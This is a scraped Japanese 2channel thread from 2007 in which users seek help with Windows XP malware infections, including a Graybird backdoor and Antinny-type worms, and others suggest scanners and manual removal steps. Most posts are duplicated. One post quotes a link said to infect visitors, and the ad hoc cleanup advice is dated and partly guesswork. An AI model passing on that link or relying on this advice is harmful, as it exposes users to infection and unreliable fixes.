Spybot定義ファイルアップデート・免疫化の再チェック
↓
Spybotでスキャン・駆除
↓
余裕があるなら、セーフモードから再びSpybotでスキャン・駆除
↓
(゚д゚)ウマー
SpywareBlasterが必要なら余裕を見て入れて下さい。
223 :名無しさん@お腹いっぱい。:2007/01/17(水) 03:12:28
ありがとうございます
難しいですが頑張ってやってみます!
難しいですが頑張ってやってみます!
224 :誘導します221=222:2007/01/17(水) 03:30:00
>>223
明日にでも覗いてみればいいです。
(携帯は辛いでしょうが)
ttp://pc10.2ch.net/test/read.cgi/sec/1168611359/l50
スパイウェア削除ソフト Spybot35
明日にでも覗いてみればいいです。
(携帯は辛いでしょうが)
ttp://pc10.2ch.net/test/read.cgi/sec/1168611359/l50
スパイウェア削除ソフト Spybot35
225 :名無しさん@お腹いっぱい。:2007/01/17(水) 04:11:32
【使用OS】
WindowsXPHome
【MicrosoftUpdate】
しています
【使用セキュリティソフト】
NortonAntiVirus2006 等
【セキュリティソフトの定義ファイルは最新の状態であるか】
はい
【ルータの有無】
あります
【スキャンの結果何が検出されたか】
ad-aware、spybot、ノートン等、検出されなかった
【どんな症状が出たのか】
リンク先を踏んだ後、telnet、outlook、realplayer、IEが勝手に起動、
侵入者に対する試み(HTTP MS WINDOWS WMF Code Exec)は、ノートンが侵入を防止。
【その他の質問】
ttp://newsheadlines.5u.com/spots/baseball/20070117-00000053-nks.html
(開くとウイルスに感染します)
このサイトを開いた後、ノートンが活動してくれて、侵入を防御してくれたんですが
その後、気になってした、スキャンには、全くウイルスの痕跡はなし。
これはウイルスに感染してなくて、大丈夫ということでしょうか?
単に侵入を単発で試みただけ?
WindowsXPHome
【MicrosoftUpdate】
しています
【使用セキュリティソフト】
NortonAntiVirus2006 等
【セキュリティソフトの定義ファイルは最新の状態であるか】
はい
【ルータの有無】
あります
【スキャンの結果何が検出されたか】
ad-aware、spybot、ノートン等、検出されなかった
【どんな症状が出たのか】
リンク先を踏んだ後、telnet、outlook、realplayer、IEが勝手に起動、
侵入者に対する試み(HTTP MS WINDOWS WMF Code Exec)は、ノートンが侵入を防止。
【その他の質問】
ttp://newsheadlines.5u.com/spots/baseball/20070117-00000053-nks.html
(開くとウイルスに感染します)
このサイトを開いた後、ノートンが活動してくれて、侵入を防御してくれたんですが
その後、気になってした、スキャンには、全くウイルスの痕跡はなし。
これはウイルスに感染してなくて、大丈夫ということでしょうか?
単に侵入を単発で試みただけ?
226 :名無しさん@お腹いっぱい。:2007/01/17(水) 10:48:40
227 :名無しさん@お腹いっぱい。:2007/01/17(水) 17:59:43
【使用OS】
WindoesXPHomeSp2
【MicrosoftUpdate】
そういやしてなかったorz
【使用セキュリティソフト】
NortoninternetSecurity2005
【セキュリティソフトの定義ファイルは最新の状態であるか】
したばっかりです
【ルータの有無】
有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出されない
【どんな症状が出るか】
「C:\WINDOWS\TEMP\E927.tmp」
等アルファベット+数字の4桁.tmpが自働で作成、実行されどっかと通信しようとする
一応ノートン先生が警告してくれるけど、起動ごとに新しい警告が出る
【症状が出る前に何をやったか】
思い当たる節がありません・・・
【症状を解決しようとどのような処置を取ったか】
タスクマネージャにてtmp実行プログラム強制終了、その後削除
ウイルスチェック
【その他の質問】
この症状が出る前に(もしくは出てる最中)ノートンのウイルスメールチェックが
狂ったように起動した症状が出たので怪しいと思われる
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5
内のvideo[1].exeやmessage[1]などのファイルを全て削除。
普通に削除しても復活するファイルでしたがもう出てきてないのでウイルス除去はできたと思うのですが
上記の症状に関係するのかも・・・?
どなたか助けてください;
WindoesXPHomeSp2
【MicrosoftUpdate】
そういやしてなかったorz
【使用セキュリティソフト】
NortoninternetSecurity2005
【セキュリティソフトの定義ファイルは最新の状態であるか】
したばっかりです
【ルータの有無】
有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出されない
【どんな症状が出るか】
「C:\WINDOWS\TEMP\E927.tmp」
等アルファベット+数字の4桁.tmpが自働で作成、実行されどっかと通信しようとする
一応ノートン先生が警告してくれるけど、起動ごとに新しい警告が出る
【症状が出る前に何をやったか】
思い当たる節がありません・・・
【症状を解決しようとどのような処置を取ったか】
タスクマネージャにてtmp実行プログラム強制終了、その後削除
ウイルスチェック
【その他の質問】
この症状が出る前に(もしくは出てる最中)ノートンのウイルスメールチェックが
狂ったように起動した症状が出たので怪しいと思われる
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5
内のvideo[1].exeやmessage[1]などのファイルを全て削除。
普通に削除しても復活するファイルでしたがもう出てきてないのでウイルス除去はできたと思うのですが
上記の症状に関係するのかも・・・?
どなたか助けてください;
228 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:07:00
>>227
Symantec以外のオンラインスキャンを試してみたら?
あとは、BitDefenderならノートンで検出できないものでも対処できるし、
非常駐型でノートンとは競合一切起こさないから安心だよ。
Symantec以外のオンラインスキャンを試してみたら?
あとは、BitDefenderならノートンで検出できないものでも対処できるし、
非常駐型でノートンとは競合一切起こさないから安心だよ。
229 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:07:24
>>227
★シマンテック・セキュリティチェック (*無償オンライン ウィルススキャンサービス)
http://www.symantec.com/region/jp/securitycheck/index.html
★シマンテック・セキュリティチェック (*無償オンライン ウィルススキャンサービス)
http://www.symantec.com/region/jp/securitycheck/index.html
230 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:10:48
>>227
ちなみにNortoninternetSecurity2005 はスパイウェアに対応してないよ
「Spybot」と「Ad-Aware SE」もためしたほうがいいしインターネットゾーンの設定も見直したほうがいい
ちなみにNortoninternetSecurity2005 はスパイウェアに対応してないよ
「Spybot」と「Ad-Aware SE」もためしたほうがいいしインターネットゾーンの設定も見直したほうがいい
231 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:22:55
【使用OS】 「」
【Windows Updateの状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態であるか】 「」
【スパイウェア対策ソフト】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 「」
【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」
見にくいんで少し手直ししてみたのと、
スパイウェア対策ソフトの行を追加してみたけどどうですか?
【Windows Updateの状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態であるか】 「」
【スパイウェア対策ソフト】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 「」
【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」
見にくいんで少し手直ししてみたのと、
スパイウェア対策ソフトの行を追加してみたけどどうですか?
232 : ◆N9P3SuvBPo :2007/01/17(水) 18:23:26
>227
>【MicrosoftUpdate】
>そういやしてなかったorz
ウソを付くな
SP2ならデフォルトで自動更新になってるから最新のはずだ。
>【MicrosoftUpdate】
>そういやしてなかったorz
ウソを付くな
SP2ならデフォルトで自動更新になってるから最新のはずだ。
233 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:24:38
>>228
>>229
>>230
あまりのレスの速さに( ゚Д゚)ポカーン
重くなるのが嫌で今までNorton2005で頑張ってたんですが
さすがにもう限界かもしれませんね。
教えて頂いたものをひとつずつ試してみます!
どうもありがとう!
>>229
>>230
あまりのレスの速さに( ゚Д゚)ポカーン
重くなるのが嫌で今までNorton2005で頑張ってたんですが
さすがにもう限界かもしれませんね。
教えて頂いたものをひとつずつ試してみます!
どうもありがとう!
234 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:26:18
235 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:28:42
236 :名無しさん@お腹いっぱい。:2007/01/17(水) 18:35:29
「NIS2007のセキュリティインスペクタ機能」+「Spybot」+「Ad-Aware SE」+「Spyware Blaster」
でスパイウェア対策は問題無いよ
http://pc10.2ch.net/test/read.cgi/sec/1168657377/l5
でスパイウェア対策は問題無いよ
http://pc10.2ch.net/test/read.cgi/sec/1168657377/l5
237 : ◆N9P3SuvBPo :2007/01/17(水) 18:36:36
>234
たしかにセキュリティセンターから無効にできますね。
>231
乙
【Windows Updateの状態】→【Microsoft Updateの状態】にしては?
【使用セキュリティソフト】は【スパイウェア対策ソフト】も含むという意味でしたが…
ちなみにこの前のテンプレは以下でした。
【使用OS】
【WINDOWS UPDATE】
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】
【やったこと】
【とった処置】
その前のは以下
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
その前のテンプレはどうったか分かりません。
たしかにセキュリティセンターから無効にできますね。
>231
乙
【Windows Updateの状態】→【Microsoft Updateの状態】にしては?
【使用セキュリティソフト】は【スパイウェア対策ソフト】も含むという意味でしたが…
ちなみにこの前のテンプレは以下でした。
【使用OS】
【WINDOWS UPDATE】
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】
【やったこと】
【とった処置】
その前のは以下
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
その前のテンプレはどうったか分かりません。
ああ本当だ
Microsoft Updateって言うんだ
Microsoft Updateって言うんだ
239 : ◆N9P3SuvBPo :2007/01/17(水) 18:58:05
>238
ふむ、一部はセキュリティ初心者スレからの抜粋ですか。
あちらのほうは今のままでもいいでしょう。
今使ってるOSは実はオフィスのインストールはしてないんですね。
つまりオフィス製品が無いってことは、WordやExcelなどのオフィス関連の
アプリケーションが実行できない=オフィスを狙った脆弱性(Exploit)は効かない。
去年、初リカバリの後、オフィスをインストールしようかと迷ったのですが、
オフィスに脆弱性があり、これからもこのソフトを狙ったExploit-Codeが出てくるだろうと
同時に「インストールするのがめんどくさい」という下らない理由で入れていないのです。
「基本的な対策をしていれば大丈夫」…今まではこれで凌ぐ事ができましたが、
これからは「基本以上の対策をしなければならない時代」になりつつあるかもしれません。
ふむ、一部はセキュリティ初心者スレからの抜粋ですか。
あちらのほうは今のままでもいいでしょう。
今使ってるOSは実はオフィスのインストールはしてないんですね。
つまりオフィス製品が無いってことは、WordやExcelなどのオフィス関連の
アプリケーションが実行できない=オフィスを狙った脆弱性(Exploit)は効かない。
去年、初リカバリの後、オフィスをインストールしようかと迷ったのですが、
オフィスに脆弱性があり、これからもこのソフトを狙ったExploit-Codeが出てくるだろうと
同時に「インストールするのがめんどくさい」という下らない理由で入れていないのです。
「基本的な対策をしていれば大丈夫」…今まではこれで凌ぐ事ができましたが、
これからは「基本以上の対策をしなければならない時代」になりつつあるかもしれません。
240 :名無しさん@お腹いっぱい。:2007/01/17(水) 19:22:17
Wordなんかだと、オプションのセキュリティタブの中に
・保存時のファイルのプロパティから個人情報を削除する
・マクロの実行セキュリティのレベル
とかセキュリティの要所があるよね
・保存時のファイルのプロパティから個人情報を削除する
・マクロの実行セキュリティのレベル
とかセキュリティの要所があるよね
241 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:20:00
NIS2005とSPYBOTSD、Ad-AwareSEで引っかからなかったが、カルスペのKISトライアルを使ったら
かなり引っかかった。ただプロアクティブディセンスが重い気が。
NIS2007もやっと対応してきたみたいだけどどうなんだろう。
ウイルス Virus.Win32.Delf.aq
トロイ Trojan-Downloader.Win32.Small.czl
トロイ Trojan-PSW.Win32.Delf.mc
トロイ Trojan-PSW.Win32.OnLineGames.bs
トロイ Trojan-PSW.Win32.WOW.md
ほかにもぞろぞろ出てきたけど
ノートン先生やってくれるねって感じだね。
今まで何をしていたんだろうか。
かなり引っかかった。ただプロアクティブディセンスが重い気が。
NIS2007もやっと対応してきたみたいだけどどうなんだろう。
ウイルス Virus.Win32.Delf.aq
トロイ Trojan-Downloader.Win32.Small.czl
トロイ Trojan-PSW.Win32.Delf.mc
トロイ Trojan-PSW.Win32.OnLineGames.bs
トロイ Trojan-PSW.Win32.WOW.md
ほかにもぞろぞろ出てきたけど
ノートン先生やってくれるねって感じだね。
今まで何をしていたんだろうか。
242 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:24:29
>>241
2ちゃんねる専用ブラウザのdatログを誤検知じゃないよね
2ちゃんねる専用ブラウザのdatログを誤検知じゃないよね
243 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:31:56
リカバリしたとき以来、面倒だったから専用ブラは入ってないよ。
C:\Program Files\Common Files\Microsoft Shared\MSInfo\WinInfo.bak/UPX
C:\RECYCLER\NPROTECT\00007594.dll/CryptFF
C:\WINDOWS\system32\Downdll.dll
C:\RECYCLER\S-1-5-21-3753018816-1203752577-514352727-1007\Dc548.exe
C:\WINDOWS\system\logo_1.e
など
C:\Program Files\Common Files\Microsoft Shared\MSInfo\WinInfo.bak/UPX
C:\RECYCLER\NPROTECT\00007594.dll/CryptFF
C:\WINDOWS\system32\Downdll.dll
C:\RECYCLER\S-1-5-21-3753018816-1203752577-514352727-1007\Dc548.exe
C:\WINDOWS\system\logo_1.e
など
244 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:39:42
すいません、日本語が変かもしれませんが、
パソコンがInfostealer.Gampassという
ウイルスに
Windowsのsystem32のagty.dllが感染していまして、
そこをノートンでスキャンして削除したのですが
まだ感染しているらしく、また同じ場所をスキャンして削除してもまだ感染して‥
と、ウイルスとノートン(1/12に更新された最新のもの)のイタチごっこが続いています。
DELLのサポートセンターに電話しても、ノートンを最新に更新するか、初期化か、と言われ、
更には何故かサーバーに繋がらなずインターネットが使えない状態なのです。
一体どうすれば良いのでしょうか?
よろしければ何か助言を頂けるとうれしいです。
パソコンがInfostealer.Gampassという
ウイルスに
Windowsのsystem32のagty.dllが感染していまして、
そこをノートンでスキャンして削除したのですが
まだ感染しているらしく、また同じ場所をスキャンして削除してもまだ感染して‥
と、ウイルスとノートン(1/12に更新された最新のもの)のイタチごっこが続いています。
DELLのサポートセンターに電話しても、ノートンを最新に更新するか、初期化か、と言われ、
更には何故かサーバーに繋がらなずインターネットが使えない状態なのです。
一体どうすれば良いのでしょうか?
よろしければ何か助言を頂けるとうれしいです。
245 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:39:46
G-DATAはカルスペとavastから提供受けてるみたいだけどかなり重いといううわさ。
246 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:42:32
一箇所だけのスキャンじゃだめだよ。
全体の完全スキャンしないと。
あとノートンの何を使ってるのか。
全体の完全スキャンしないと。
あとノートンの何を使ってるのか。
247 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:44:02
248 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:45:19
マルウェア、ルートキット、ワームとか最近いっぱいあるしね。
249 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:47:17
古いバージョンだったら削除して、一時的にもトライアルの最新版を使ったほうがいいかも。
250 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:47:30
そういや今日見た雑誌に
独でG-DATAがシェア1位ってなってたな
独でG-DATAがシェア1位ってなってたな
251 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:48:15
trendのrootkit busterなぜかうちのpcでは動作しないorz
252 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:49:50
ブランド好きの日本人はノートン先生なのかな。
最近首位陥落みたいだけど
最近首位陥落みたいだけど
253 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:51:14
ソフトはほかとの相性という面も大きいからね。
254 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:52:02
255 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:54:33
ノートンは過去のものの更新キー購入継続版なの?
それとの2007年度版の最新なの?
それとの2007年度版の最新なの?
257 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:56:32
あとタスクマネージャ開いて不自然なの動いてない。
また勝手にウィルスが裏でネット接続してないかな。
また勝手にウィルスが裏でネット接続してないかな。
258 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:57:10
259 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:00:15
更新キーものは定義だけで、機能はジム並みなんだよね。
260 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:02:05
さすがのシャアも木馬にてこずった挙句、負けちゃったし。
261 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:06:42
一応
http://www.trendmicro.co.jp/consumer/products/trial/
http://www.symantecstore.jp/trial/index.asp
http://www.kaspersky.co.jp/trial/
http://jp.mcafee.com/root/landingpages/default.asp?lpname=ms_vso&cid=8448/
http://www.trendmicro.co.jp/consumer/products/trial/
http://www.symantecstore.jp/trial/index.asp
http://www.kaspersky.co.jp/trial/
http://jp.mcafee.com/root/landingpages/default.asp?lpname=ms_vso&cid=8448/
262 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:13:18
すいません、色々とありがとうございます。
しかし、ノートンを更新しようとも
肝心ねサーバーに繋がらない為どうすりゃいいやら‥
サーバーに繋がらない原因ってなんなのでしょう?
しかし、ノートンを更新しようとも
肝心ねサーバーに繋がらない為どうすりゃいいやら‥
サーバーに繋がらない原因ってなんなのでしょう?
263 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:23:28
ノートンのliveupdateでけに繋がらないという意味なの?
ネット自体繋がらないの?
バージョン更新キーじゃない2007でいいの
ネット自体繋がらないの?
バージョン更新キーじゃない2007でいいの
264 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:28:37
ありがとうございます。
やってみます
やってみます
265 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:35:11
266 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:44:27
すいません。
なにぶんパソコンのサーバーがまったく繋がらなず、
しかも何世代も前の携帯から書き込んでいる為
テンプレさえまともに見ませんでした。
なにぶんパソコンのサーバーがまったく繋がらなず、
しかも何世代も前の携帯から書き込んでいる為
テンプレさえまともに見ませんでした。
267 : ◆N9P3SuvBPo :2007/01/17(水) 22:15:14
>244
ずっと前ならHijackThisのFIX処理orセーフモードでシステムの復元だけで
問題解決してたんだけど、今は復元妨害したり、HijackThisでFIXしても
FIXしたエントリを復活させる奴がいるからな。
リカバリ(初期化)が一番かと思われますよ。
ノートンを最新にしても完全に駆除できる保証は無いから。
ずっと前ならHijackThisのFIX処理orセーフモードでシステムの復元だけで
問題解決してたんだけど、今は復元妨害したり、HijackThisでFIXしても
FIXしたエントリを復活させる奴がいるからな。
リカバリ(初期化)が一番かと思われますよ。
ノートンを最新にしても完全に駆除できる保証は無いから。
268 :名無しさん@お腹いっぱい。:2007/01/17(水) 23:36:03
【使用OS】 winXP
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 ノートン
【セキュリティソフトの定義ファイルは最新の状態であるか】 最近期限が切れました
【ルータの有無】 有?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Trojan Pigeon GZ si(Backdoor.Graybird)
【どんな症状が出るか】 どこかのPCにアクセスしようとする
【症状が出る前に何をやったか】 ネットサーフィン
【症状を解決しようとどのような処置を取ったか】 色んなサイトで検索したらe-trastとSpyware Doctorで検出されました。
【その他の質問】
シマンテックのサイトを見てやってみてもSvch0st.exeを終了するとPCが終了してしまうし、
Svch0st.exeが5個あるのでどれがウイルスか分かりません・・・
オンラインで駆除できるサイトがなくて(というか検出されない)手動でやるしかないのですがどうすれば除去できるでしょうか?
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 ノートン
【セキュリティソフトの定義ファイルは最新の状態であるか】 最近期限が切れました
【ルータの有無】 有?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Trojan Pigeon GZ si(Backdoor.Graybird)
【どんな症状が出るか】 どこかのPCにアクセスしようとする
【症状が出る前に何をやったか】 ネットサーフィン
【症状を解決しようとどのような処置を取ったか】 色んなサイトで検索したらe-trastとSpyware Doctorで検出されました。
【その他の質問】
シマンテックのサイトを見てやってみてもSvch0st.exeを終了するとPCが終了してしまうし、
Svch0st.exeが5個あるのでどれがウイルスか分かりません・・・
オンラインで駆除できるサイトがなくて(というか検出されない)手動でやるしかないのですがどうすれば除去できるでしょうか?
269 : ◆N9P3SuvBPo :2007/01/17(水) 23:41:58
>268
Svch0st.exe?
Svchost.exeじゃなくて
Svch0st.exe?
Svchost.exeじゃなくて
270 :名無しさん@お腹いっぱい。:2007/01/17(水) 23:51:31
Svchost.exeです。シマンテックのサイトからコピペしたんだけど間違ってますね・・・
271 : ◆N9P3SuvBPo :2007/01/18(木) 00:25:40
>270
この「Trojan Pigeon GZ si(Backdoor.Graybird)」がどの場所で検出されたかは知らない?
ネットサーフィンだけでこのようなウイルスに感染することは無いと思うんですが。
この「Trojan Pigeon GZ si(Backdoor.Graybird)」がどの場所で検出されたかは知らない?
ネットサーフィンだけでこのようなウイルスに感染することは無いと思うんですが。
272 :名無しさん@お腹いっぱい。:2007/01/18(木) 00:32:52
Key "hkey_local_machine \"かな?
昨日からおかしくて昨日はネットサーフィンしかしてないんです。
winnyで落としたものは必ずスキャンしてるし・・・
昨日からおかしくて昨日はネットサーフィンしかしてないんです。
winnyで落としたものは必ずスキャンしてるし・・・
273 : ◆N9P3SuvBPo :2007/01/18(木) 00:40:11
>272
調べてきたぞ。
これですね↓
ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.graybird.b.html
たしかにSvch0st.exeでしたね。
0(ゼロ)とo(オー)を見間違えないように良く見てもう一度駆除作業を行ってください。
あと最後の行はどういう意味かなw
調べてきたぞ。
これですね↓
ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.graybird.b.html
たしかにSvch0st.exeでしたね。
0(ゼロ)とo(オー)を見間違えないように良く見てもう一度駆除作業を行ってください。
あと最後の行はどういう意味かなw
274 :P2Pは禁止だからな:2007/01/18(木) 00:57:33
>>272
何となくわかってたけどねwwww
↓
「仁義なきキンタマ」は、svchost.exeという名前で活動をします。
svchost.exeは、普通にWindowsを動かしていれば複数個動いていてもまったく問題ありません。
そのために、誤ってWindowsの作動に必要なsvchostを削除してしまうという人が後を絶ちません。
そこで、ウイルス本体と無害なsvchost.exeの見分け方を書いておきます。
まず、Ctrl+Alt+Delでタスクマネージャーを開いてください。
次にプロセスタブを開きます。
すると、svchost.exeというのが動いていると思います。
そのときに、そのsvchost.exeを動かしているのが誰なのかを見てください。
svchost.exeの右隣にある文字がそれです。
それが、「SYSTEM」、「NETWORK SERVIVE」、「LOCAL SERVICE」などなら問題はありません。
しかし、実行しているユーザー名が感染しているマシンのユーザー名(Ownerなど)の場合だと、
それは「仁義なきキンタマ」である可能性があります。
それだと思われるプロセスを見つけた場合は、そのプロセスをクリックして「プロセスの終了」をクリックしてください。
警告がでると思いますが、「はい」を押してください。そして、下記の駆除を行ってください。
何となくわかってたけどねwwww
↓
「仁義なきキンタマ」は、svchost.exeという名前で活動をします。
svchost.exeは、普通にWindowsを動かしていれば複数個動いていてもまったく問題ありません。
そのために、誤ってWindowsの作動に必要なsvchostを削除してしまうという人が後を絶ちません。
そこで、ウイルス本体と無害なsvchost.exeの見分け方を書いておきます。
まず、Ctrl+Alt+Delでタスクマネージャーを開いてください。
次にプロセスタブを開きます。
すると、svchost.exeというのが動いていると思います。
そのときに、そのsvchost.exeを動かしているのが誰なのかを見てください。
svchost.exeの右隣にある文字がそれです。
それが、「SYSTEM」、「NETWORK SERVIVE」、「LOCAL SERVICE」などなら問題はありません。
しかし、実行しているユーザー名が感染しているマシンのユーザー名(Ownerなど)の場合だと、
それは「仁義なきキンタマ」である可能性があります。
それだと思われるプロセスを見つけた場合は、そのプロセスをクリックして「プロセスの終了」をクリックしてください。
警告がでると思いますが、「はい」を押してください。そして、下記の駆除を行ってください。
275 :名無しさん@お腹いっぱい。:2007/01/18(木) 00:58:01
>>273
windos.dll
windos.exe
windos_hook.dll
%windows%\windos_hook.dll
%windows%\windos.dll
%windows%\windos.exe
ファイル名は↑みたいです。 すみません・・・<最後の行
レジストリを書き換えられるって書いてあるけど見ても見つからないんです。亜種・・・?
Svchost.exeが5個あってユーザー名がSYSTEMのが2個、NETWORK SERVICEが2個、
LOCAL SERVICEが1個でどれを終了させればいいのか・・・
トロイが繋ごうとしてる回線業者に連絡しても意味ないかなぁ・・・
windos.dll
windos.exe
windos_hook.dll
%windows%\windos_hook.dll
%windows%\windos.dll
%windows%\windos.exe
ファイル名は↑みたいです。 すみません・・・<最後の行
レジストリを書き換えられるって書いてあるけど見ても見つからないんです。亜種・・・?
Svchost.exeが5個あってユーザー名がSYSTEMのが2個、NETWORK SERVICEが2個、
LOCAL SERVICEが1個でどれを終了させればいいのか・・・
トロイが繋ごうとしてる回線業者に連絡しても意味ないかなぁ・・・
276 :P2Pは禁止だからな:2007/01/18(木) 01:03:59
277 : ◆N9P3SuvBPo :2007/01/18(木) 01:08:33
>275
>Svchost.exeが5個あってユーザー名がSYSTEMのが2個、NETWORK SERVICEが2個、
>LOCAL SERVICEが1個
それなら問題無い。
結局>268で言っていた「Svch0(ゼロ)st.exe」という名前のファイルは
PC内のファイルを検索しても、目視でも確認できず、さらにレジストリの検索でも見付からない
ということで、実際検出されたのは>275で述べたファイル群ですよね。
とりあえず、windos.dllやwindos.exeとかをググってみて。
>Svchost.exeが5個あってユーザー名がSYSTEMのが2個、NETWORK SERVICEが2個、
>LOCAL SERVICEが1個
それなら問題無い。
結局>268で言っていた「Svch0(ゼロ)st.exe」という名前のファイルは
PC内のファイルを検索しても、目視でも確認できず、さらにレジストリの検索でも見付からない
ということで、実際検出されたのは>275で述べたファイル群ですよね。
とりあえず、windos.dllやwindos.exeとかをググってみて。
278 :P2Pは禁止だからな:2007/01/18(木) 01:08:55
C:\WINDOWS\system32\drivers\svchost.exeを削除。↑をしないと実行中の為、削除不可
スタートボタン→ファイル名を指定して実行「Msconfig」→スタートアップ→Svchost.exeのチェックをOFF(場所がwindows\drivers-autoとなっているの分かりやすい)orレジストリエディタで C:\WINDOWS\Msnie にあるexeを削除
C:\WINDOWS\system32\wbem にあるexeを削除
・・・などばらまかれたexeを削除
終わります◆N9P3SuvBPo 氏
申し訳なかった^^
C:\WINDOWS\system32\wbem にあるexeを削除
・・・などばらまかれたexeを削除
終わります◆N9P3SuvBPo 氏
申し訳なかった^^
281 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:24:45
272にユーザー名で動いてるSvchost.exeは無いみたいだが・・・
282 : ◆N9P3SuvBPo :2007/01/18(木) 01:26:15
>278
>(ユーザー名で実行されている物)
ユーザー名=現在ログオン中のユーザー名?
>280
うん。
しかし彼が言うにはsvchost.exeではなくsvch0st.exeなんですが…
もし本当にsvchost.exeからの検出であれば、検出されたファイルの正確な場所を尋ねますけどね。
それかHijackThisのログをここに貼らせて、確認するのも手だし。
そういえばsvchost.exe(正規ファイルの方)はc:\windows\system32\でしたっけ?
それ以外の場所で見付かったら、間違い無くAntinny系ということですよね。
本当のこと言うとAntinny系ウイルスとは関わりたくないものですが…
>(ユーザー名で実行されている物)
ユーザー名=現在ログオン中のユーザー名?
>280
うん。
しかし彼が言うにはsvchost.exeではなくsvch0st.exeなんですが…
もし本当にsvchost.exeからの検出であれば、検出されたファイルの正確な場所を尋ねますけどね。
それかHijackThisのログをここに貼らせて、確認するのも手だし。
そういえばsvchost.exe(正規ファイルの方)はc:\windows\system32\でしたっけ?
それ以外の場所で見付かったら、間違い無くAntinny系ということですよね。
本当のこと言うとAntinny系ウイルスとは関わりたくないものですが…
ユーザー名で動いてなければ俺の
誤爆ですな。
svchost.exeはよく判断が曖昧なのだが。。
誤爆ですな。
svchost.exeはよく判断が曖昧なのだが。。
>それ以外の場所で見付かったら、間違い無くAntinny系ということですよね。
俺の見解は
99.99999999%位ですね
>しかし彼が言うにはsvchost.exeではなくsvch0st.exeなんですが…
怪しいですな
俺の見解は
99.99999999%位ですね
>しかし彼が言うにはsvchost.exeではなくsvch0st.exeなんですが…
怪しいですな
285 : ◆N9P3SuvBPo :2007/01/18(木) 01:50:02
>284
最後にもうひとつだけですが、>274にて
>「仁義なきキンタマ」は、svchost.exeという名前で活動をします。
とありますが、果たして本当にそう言いきれますか?
Antinnyの中には"C:\Program Files\<ランダムにコピーされたフォルダ>\<ランダムにコピーされた名前>.exe"
で活動するのだってありますよ。
>怪しいですな
彼を信じてあげましょうよ。
最後にもうひとつだけですが、>274にて
>「仁義なきキンタマ」は、svchost.exeという名前で活動をします。
とありますが、果たして本当にそう言いきれますか?
Antinnyの中には"C:\Program Files\<ランダムにコピーされたフォルダ>\<ランダムにコピーされた名前>.exe"
で活動するのだってありますよ。
>怪しいですな
彼を信じてあげましょうよ。
286 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:57:45
>>280
スタートボタン→ファイル名を指定して実行「Msconfig」→スタートアップ→Svchost.exeの
Svchost.exeが見当たりません。一覧にwindows\drivers-autoもないです。
一人で使ってるからログオンとかがないのでそのせいでしょうか??
5個あるのはsvch0st.exeじゃなくてsvchost.exeです。
PC内をsvchost.exeで検索したらWINDOWS\system32に一つと、
WINDOWS\PrefetchにSVCHOST.EXE-3530F672.pfというのが出てきました。
SVCHOST.EXE-3530F672.pfはゴミ箱に入れたほうがいいでしょうか?
今シマンテックでもう一度スキャンしたらDownloader.Trojanというのが検出された・・・orz
スタートボタン→ファイル名を指定して実行「Msconfig」→スタートアップ→Svchost.exeの
